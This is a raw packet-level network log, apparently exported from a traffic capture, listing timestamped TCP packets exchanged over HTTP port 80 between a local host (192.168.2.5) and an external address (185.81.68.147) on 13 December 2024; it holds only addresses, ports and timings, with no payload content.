Dec 13, 2024 01:37:11.274991989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.275068045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.275779009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.275895119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.275970936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.276683092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.276835918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.276915073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.277612925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.277712107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.277779102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.278518915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.278621912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.278687000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.279481888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.279500008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.279562950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.280338049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.280442953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.280509949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.281303883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.281383038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.281457901 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.282144070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.282260895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.282346964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.283071995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.283164024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.283231020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.284012079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.284204006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.284286022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.284909010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.285119057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.285197973 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.285775900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.285911083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.285979986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.286695004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.286834955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.286902905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.287595987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.287718058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.287790060 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.288516045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.288665056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.288731098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.289412022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.289567947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.289633036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.290332079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.290452003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.290527105 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.291297913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.291429043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.291506052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.292149067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.292192936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.292256117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.293062925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.293140888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.293204069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.293977022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.294101954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.294167995 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.294872999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.294987917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.295063019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.295797110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.295911074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.295988083 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.296684027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.296812057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.296878099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.297596931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.297712088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.297776937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.298521042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.298629045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.298693895 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.299464941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.299643040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.299707890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.300343037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.300472975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.300551891 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.301268101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.301373959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.301453114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.302135944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.302273035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.302345037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.303059101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.303158998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.303227901 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.303960085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.304075956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.304152012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.304887056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.304991961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.305071115 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.307648897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.307707071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.307723045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.307774067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.307853937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.307869911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.307887077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.307924986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.307941914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.308511972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.348417044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.452769995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.452915907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.453115940 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.453177929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.453273058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.453363895 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.454062939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.454190969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.454277992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.454956055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.455118895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.455197096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.455892086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.455985069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.456060886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.456792116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.456897020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.456975937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.457709074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.457802057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.457866907 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.458602905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.458765984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.458842039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.459510088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.459606886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.459681034 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.460418940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.460525036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.460601091 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.461324930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.461412907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.461488962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.462222099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.462361097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.462435961 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.463184118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.463262081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.463363886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.464052916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.464169025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.464243889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.464965105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.465097904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.465171099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.465887070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.466017008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.466090918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.466809034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.466919899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.466996908 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.467730045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.467818975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.467897892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.468624115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.468755960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.468833923 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.469533920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.469660997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.469742060 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.470458031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.470581055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.470658064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.471362114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.471448898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.471527100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.472242117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.472372055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.472451925 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.473215103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.473273993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.473377943 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.474061012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.474189997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.474268913 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.474961996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.475085974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.475164890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.475869894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.476016998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.476095915 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.476802111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.476908922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.476994038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.477700949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.477821112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.477900028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.478620052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.478756905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.478835106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.479538918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.479631901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.479708910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.480441093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.480593920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.480670929 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.481363058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.481456995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.481534004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.482292891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.482506990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.482589960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.483169079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.483341932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.483443975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.484065056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.484180927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.484253883 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.485002041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.485148907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.485223055 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.485897064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.486021996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.486095905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.486804962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.486912966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.486985922 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.487775087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.487886906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.487960100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.488636971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.488771915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.488848925 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.489556074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.489669085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.489744902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.490443945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.490547895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.490622044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.491362095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.491467953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.491540909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.492275953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.492369890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.492450953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.493174076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.493380070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.493459940 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.494076967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.494196892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.494270086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.494985104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.495100975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.495174885 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.495891094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.496006012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.496081114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.496798992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.496916056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.496989965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.497759104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.497838020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.497911930 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.498639107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.498749018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.498825073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.499571085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.499649048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.499727011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.500416994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.551541090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.644607067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.644638062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.644810915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.644870043 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.644946098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.644992113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.645735979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.645859957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.645970106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.646629095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.646718979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.646804094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.647553921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.647665977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.647747993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.648463011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.648576975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.648658991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.649363041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.649564981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.649642944 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.650274992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.650448084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.650526047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.651210070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.651341915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.651422024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.652127028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.652220964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.652302980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.653016090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.653106928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.653186083 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.653909922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.654020071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.654098034 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.654819012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.654963970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.655042887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.655716896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.655837059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.655915022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.656629086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.656744003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.656826019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.657538891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.657648087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.657723904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.658449888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.658565998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.658643961 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.659359932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.659468889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.659544945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.660303116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.660378933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.660458088 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.661192894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.661288977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.661367893 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.662132978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.662271023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.662348032 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.663341045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.663501978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.663579941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.663913012 CET	80	49707	185.81.68.147	192.168.2.5
